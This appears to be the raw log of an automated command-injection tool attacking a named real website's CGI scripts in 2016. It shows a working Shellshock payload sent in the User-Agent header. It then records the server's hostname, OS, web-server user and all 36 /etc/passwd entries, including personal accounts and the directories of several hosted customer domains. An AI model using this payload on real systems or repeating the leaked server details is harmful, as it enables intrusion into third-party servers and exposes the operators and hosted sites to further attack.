---

Time : 19:26:04
Date : 05/10/2016
---
URL : http://dianet.com.ar/cgi-bin/bb-histlog.sh/
---
---
Time : 19:26:45
Date : 05/10/2016
---
URL : http://dianet.com.ar/cgi-bin/bb-histlog.sh/
---
---
Time : 19:42:01
Date : 05/10/2016
---
URL : http://dianet.com.ar/cgi-bin/bb-hist.sh/
---
(+) Type : results-based command injection
(+) Technique : Shellshock Injection Technique
(+) Parameter : User-Agent HTTP Header
(1) Payload : () { :; }; echo CVE-2014-6271:Done;
(!) The hostname is servidorweb.dianet.com.ar.
(!) The target operating system is Linux and the hardware platform is i686.
(!) The current user is www-data and it is not privileged.

(!) Identified 36 entries in '/etc/passwd'.

(1) 'root' is root user (uid=0). Home directory is in '/root'.
(2) 'daemon' is system user (uid=1). Home directory is in '/usr/sbin'.
(3) 'bin' is system user (uid=2). Home directory is in '/bin'.
(4) 'sys' is system user (uid=3). Home directory is in '/dev'.
(5) 'sync' is system user (uid=4). Home directory is in '/bin'.
(6) 'games' is system user (uid=5). Home directory is in '/usr/games'.
(7) 'man' is system user (uid=6). Home directory is in '/var/cache/man'.
(8) 'lp' is system user (uid=7). Home directory is in '/var/spool/lpd'.
(9) 'mail' is system user (uid=8). Home directory is in '/var/mail'.
(10) 'news' is system user (uid=9). Home directory is in '/var/spool/news'.
(11) 'uucp' is system user (uid=10). Home directory is in '/var/spool/uucp'.
(12) 'proxy' is system user (uid=13). Home directory is in '/bin'.
(13) 'www-data' is system user (uid=33). Home directory is in '/var/www'.
(14) 'backup' is system user (uid=34). Home directory is in '/var/backups'.
(15) 'list' is system user (uid=38). Home directory is in '/var/list'.
(16) 'irc' is system user (uid=39). Home directory is in '/var/run/ircd'.
(17) 'gnats' is system user (uid=41). Home directory is in '/var/lib/gnats'.
(18) 'nobody'(uid=65534). Home directory is in '/nonexistent'.
(19) 'jorge' is regular user (uid=1000). Home directory is in '/home/jorge'.
(20) 'sshd' is regular user (uid=100). Home directory is in '/var/run/sshd'.
(21) 'mysql' is regular user (uid=101). Home directory is in
'/var/lib/mysql'.
(22) 'bind' is regular user (uid=102). Home directory is in
'/var/cache/bind'.
(23) 'postfix' is regular user (uid=103). Home directory is in
'/var/spool/postfix'.
(24) 'proftpd' is regular user (uid=104). Home directory is in
'/var/run/proftpd'.
(25) 'ftp' is regular user (uid=105). Home directory is in '/home/ftp'.
(26) 'vmail' is regular user (uid=1001). Home directory is in '/home/vmail'.
(27) 'vu2001' is regular user (uid=2001). Home directory is in
'/var/www/virtual/dianet.com.ar'.
(28) 'vu2003' is regular user (uid=2003). Home directory is in
'/var/www/virtual/veronicaesvolver.com.ar'.
(29) 'amavis' is regular user (uid=106). Home directory is in
'/var/lib/amavis'.
(30) 'clamav' is regular user (uid=106). Home directory is in
'/var/lib/clamav'.
(31) 'murray' is regular user (uid=1002). Home directory is in
'/home/murray'.
(32) 'vu2005' is regular user (uid=2005). Home directory is in
'/var/www/virtual/cultivosdelsur.com.ar'.
(33) 'vu2006' is regular user (uid=2006). Home directory is in
'/var/www/virtual/bambinaseventos.com.ar'.
(34) 'bb' is regular user (uid=1003). Home directory is in '/home/bb'.
(35) 'vu2010' is regular user (uid=2010). Home directory is in
'/var/www/virtual/hoteldelmarveronica.com.ar'.
(36) 'vu2011' is regular user (uid=2011). Home directory is in
'/var/www/virtual/laseisdediciembre.com.ar'.